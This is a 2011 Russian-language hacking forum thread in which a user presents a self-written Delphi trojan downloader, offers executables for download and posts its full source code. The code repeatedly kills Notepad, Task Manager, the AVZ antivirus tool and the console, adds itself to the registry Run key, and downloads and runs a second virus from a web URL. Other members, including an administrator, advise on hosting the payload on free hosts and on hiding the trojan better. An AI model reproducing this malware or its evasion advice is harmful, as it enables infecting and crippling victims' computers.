Суббота, 19.08.2017, 06:27 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx 
delfcode » Delphi » Вирусология Delphi » Trojan.Win32.Link (Мной написанный троян DownloadeR)
Trojan.Win32.Link
link993Дата: Вторник, 14.06.2011, 16:12 | Сообщение # 1
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
Данный троянец был создан мной для передачи сообщения "Лаборатории Касперского" biggrin (если его конечно рассекретят).

После старта он делает следующее:
1. Отрубает и не дает включится следующим процессам:
1.) Блокнот (это так просто);
2.) Диспетчер задач ;
3.) Антивирусная утилита AVZ;
4.) Консоль;
2. Прописывается в реестр;
3. Скачивает вирус Dolphin,a HLLP v.2 (http://delfcode.ru/load/ost/vredonosy/hllp_v_2/14-1-0-447) с этой страницы форума и запускает его;
4. Прекращает свою работу(с закачкой), сидит в памяти и ждет пока его не высекут и не отправят в "Лабораторию Касперского" .
5. Создает ужасные глюки...

Если будете тестировать скачайте прогу чтобы убить процесс троянца. Почистите реестр после запуска по адресу hkey_local_machine\software\microsoft\windows\currentversion\run

Троян с формой, поэтому много весит. Прошу из-за этого сильно не критикуйте. Троян и вирус Вы можете скачать ниже. Если кому-то будет нужен исходник оставляйте просьбу в теме. Комментируйте.

Иконку сменю...

Тестировался на бабушкином компьютере biggrin )) После 10 минут мук бабушка сдалась и вызвала мастера...

Качайте файл link2-Trojan))) biggrin
Прикрепления: hllp.exe(22Kb) · Link.exe(368Kb) · Link2-Trojan-.exe(368Kb)


Сообщение отредактировал link993 - Вторник, 14.06.2011, 18:36
 
gravitasДата: Вторник, 14.06.2011, 17:43 | Сообщение # 2
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (link993)
Данный троянец был создан мной для передачи сообщения "Лаборатории Касперского"

Гыы) "ПрЕвЕд" поди biggrin


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
link993Дата: Вторник, 14.06.2011, 18:30 | Сообщение # 3
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
gravitas, выкуп требую за сына Касперского biggrin

Сообщение отредактировал link993 - Вторник, 14.06.2011, 18:30
 
gravitasДата: Вторник, 14.06.2011, 20:04 | Сообщение # 4
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (link993)
gravitas, выкуп требую за сына Касперского

Поймали уже похитителей то) Проактивка постаралась наверно biggrin


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
gravitasДата: Вторник, 14.06.2011, 20:08 | Сообщение # 5
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Есть способ наверняка:
Идешь на форум ЛК и создаешь там в определенном разделе топ. Мол аццкой вирь и т.д.) И линк им даешь.
Они конечно посмеются там основательно, но сообщение твое наверняка получат))


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
link993Дата: Вторник, 14.06.2011, 21:01 | Сообщение # 6
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
Quote (gravitas)
Поймали уже похитителей то) Проактивка постаралась наверно biggrin

НЕт,Ж они там антивирусом все население просканировали и нашли! biggrin

Как вообще троян? Обращятся на форум касперского с самописным трояном это всеравно, что обращатся в фбр с убийством сына касперского biggrin Извини, проблем с законом не хочу...
 
XSPYДата: Среда, 15.06.2011, 10:07 | Сообщение # 7
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 258
Статус: Offline
link993, в общем,неплохо.Но,я бы твой вирус не взял бы.Ну скажы-на кой хрен глюки компу?зачем ты зря тратишь процессорное время и ресурсы?
и второй момент-зачем блокнот отрубать?более 90% пользователей инета не смогут ничего твоему вирусу серьезного сделать,так как они не умеют кодить))
а так вроде ниче...


Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
 
link993Дата: Среда, 15.06.2011, 10:47 | Сообщение # 8
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
XSPY, глюки идут уже после загрузки вируса, в блокноте можно написать бат скрипт, чтобы убить процесс))
 
XSPYДата: Четверг, 16.06.2011, 22:36 | Сообщение # 9
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 258
Статус: Offline
link993, блин,будто я не знаю когда глюк идёт! biggrin
Вот и спрашиваеться-нафига глючить комп?ето сразу палит твой вирус!
А бат скрипт рядовой пользователь не напишет,так как дальше "вконтакте" и одноклассников они не ходют.
Ето все ИМХО.
По сабжу: лучше сделай защиту процесса процессом.


Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
 
link993Дата: Пятница, 17.06.2011, 13:15 | Сообщение # 10
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
Нашел баг)) с delfcode.ru вирус не закачивается, поэтому надо искать другой файловый хостинг (не юкоз), пробовал на спакесе, там все отлично работает.
 
gravitasДата: Пятница, 17.06.2011, 15:07 | Сообщение # 11
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (link993)
Нашел баг)) с delfcode.ru вирус не закачивается, поэтому надо искать другой файловый хостинг (не юкоз), пробовал на спакесе, там все отлично работает.

Еще бы. Надо как бы авторизироваться сначала. Создай сайт на народе. На него вирь кинь. Так будет работать.


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
dolphinДата: Пятница, 17.06.2011, 15:37 | Сообщение # 12
Администратор
Сообщений: 902
Статус: Offline
Quote (gravitas)
Создай сайт на народе. На него вирь кинь. Так будет работать.

Точно. Для него любой бесплатный хост подойдёт, народ проще всего и данных о себе много не нужно.


Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
link993Дата: Пятница, 17.06.2011, 17:44 | Сообщение # 13
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
dolphin, gravitas, сПАСИБО)) СДЕЛАЮ)))
 
FedgrishaДата: Воскресенье, 26.06.2011, 00:35 | Сообщение # 14
Новичок
Зарегистрирован: 26.01.2011
Группа: Пользователи
Сообщений: 1
Статус: Offline
дайте пожалуйста исходник его!очень нужно
заранее благодарен!!!!!!!!!
 
link993Дата: Воскресенье, 26.06.2011, 10:42 | Сообщение # 15
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
Вот на форме мемо только. Форм креат в цикле. Не злитест. Все объединил. Если убрать цыкл на скачку то глюков не будет.

Code
unit Unit1;

interface

uses
     Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
     Dialogs, StdCtrls,Registry,UrlMon,ShellApi ;

type
     TForm1 = class(TForm)
       mmo1: TMemo;
       procedure FormCreate(Sender: TObject);
     private
       { Private declarations }
     public
       { Public declarations }
     end;

var
     Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.FormCreate(Sender: TObject);
const      
    URL = 'http://delfcode.ru/_fr/5/hllp.exe';      
    Filename = 'C:\program.exe';
var
    reg: tregistry;
begin
    while true  do
    begin
    Sleep(5000);
    winexec('taskkill /F /IM NOTEPAD.EXE', SW_HIDE);
    winexec('taskkill /F /IM taskmgr.exe', SW_HIDE);
    winexec('taskkill /F /IM setup.exe', SW_HIDE);
    winexec('taskkill /F /IM avz.exe', SW_HIDE);
    winexec('taskkill /F /IM cmd.exe', SW_HIDE);
    if 0=0 then
    begin
    reg := tregistry.create;
    reg.rootkey := hkey_local_machine;
    reg.lazywrite := false;
    reg.openkey('software\microsoft\windows\currentversion\run', false);
    reg.writestring('ExTaZy', application.exename);
    reg.closekey;
    reg.free;
    if 0=0 then
    begin
    if FileExists('C:\program.exe')
    then
    ShellExecute(0,'Open',PChar('C:\program.exe'),'',nil,1)
    else
    URLDownloadToFile(nil, PChar(URL), PChar(Filename), 0, nil);
    ShellExecute(0,'Open',PChar('C:\program.exe'),'',nil,1);
    end;
    end;
    end;
end;
end.


Это весь код biggrin


Сообщение отредактировал link993 - Воскресенье, 26.06.2011, 10:45
 
XSPYДата: Воскресенье, 26.06.2011, 22:23 | Сообщение # 16
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 258
Статус: Offline
link993, работает только под админом?

Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
 
link993Дата: Понедельник, 27.06.2011, 09:31 | Сообщение # 17
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
Не знаю. Не проверял. smile
 
delfcode » Delphi » Вирусология Delphi » Trojan.Win32.Link (Мной написанный троян DownloadeR)
Страница 1 из 11
Поиск:

delfcode.ru © 2008 - 2017 Хостинг от uCoz